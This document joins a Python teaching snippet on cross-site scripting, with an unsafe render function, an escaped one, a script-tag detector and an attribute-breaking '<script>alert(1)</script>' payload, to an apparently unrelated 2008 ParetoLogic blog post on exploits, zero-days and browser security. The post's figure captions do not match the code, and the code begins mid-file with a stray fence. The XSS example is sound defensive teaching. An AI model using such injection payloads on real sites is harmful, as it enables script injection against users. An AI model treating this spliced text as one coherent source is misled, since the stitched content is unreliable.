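def render_unsafe(query: str) -> str:
    """Vulnerable version: the query is pasted into the page as raw markup, so a query
    containing a <script> tag becomes script the victim's browser runs on this site."""
    return TEMPLATE.format(query, query)


def render_safe(query: str) -> str:
    """Hardened version: each value is encoded for the context it lands in.
    html.escape neutralises markup in the text node; quote() URL-encodes the href value."""
    return TEMPLATE.format(html.escape(query, quote=True), quote(query, safe=""))


def has_markup_injection(markup: str) -> bool:
    """Crude check for an unescaped script tag or an attribute-breaking quote sequence."""
    lowered = markup.lower()
    return "<script" in lowered or '"><' in lowered


# Constructed payload: breaks out of an attribute and injects a script tag.
PAYLOAD = '"><script>alert(1)</script>'


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD))
    print("safe:  ", render_safe(PAYLOAD))
```

With the payload as the query, the unsafe page contains a live script tag and a broken `href`; the hardened page shows the payload back to the user as harmless text, which is the whole point of output encoding.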


Figure 3: poorly written malicious JavaScript

Pure exploits
Exploits, also known as attacks, take advantage of software vulnerabilities. As alarming as it sounds, there are many known vulnerabilities still unpatched by Microsoft or other software companies. Blackhat hackers are constantly looking for new ways to find a bug in common software or Operating Systems. Some exploits are released in the wild (out there on the Internet) before anybody has a fix for them; they are called ‘zero-day exploits’. Although we can patch our PCs against older exploits, we are still vulnerable to the zero-day ones.
Types of exploits include memory overflows, SQL injection and other types of code injection.


Figure 4: a malicious DLL file caused an exception in Internet Explorer 7

As we saw, malware authors are using all sorts of techniques to distribute their malicious code. It’s not always in their interest to make it visible to the user. For example, credit card or password stealing Trojans rely on being stealthy and undetected.
There are many hot debates on which browser is most secure. After all, the browser is your gateway to the Internet. There is however a general consensus that Internet Explorer is one of the most unsafe browsers. Because it is the default browser on Windows machines, it is heavily targeted by hackers. But vulnerabilities are not unique to Microsoft products, and concern everybody. Firefox, often praised as the most secure browser, has had its share and periodically patches itself up.

This is just a reminder that the online safety battle is far from being over.

Jerome Segura

Posted in Exploits




© 2008 ParetoLogic Inc.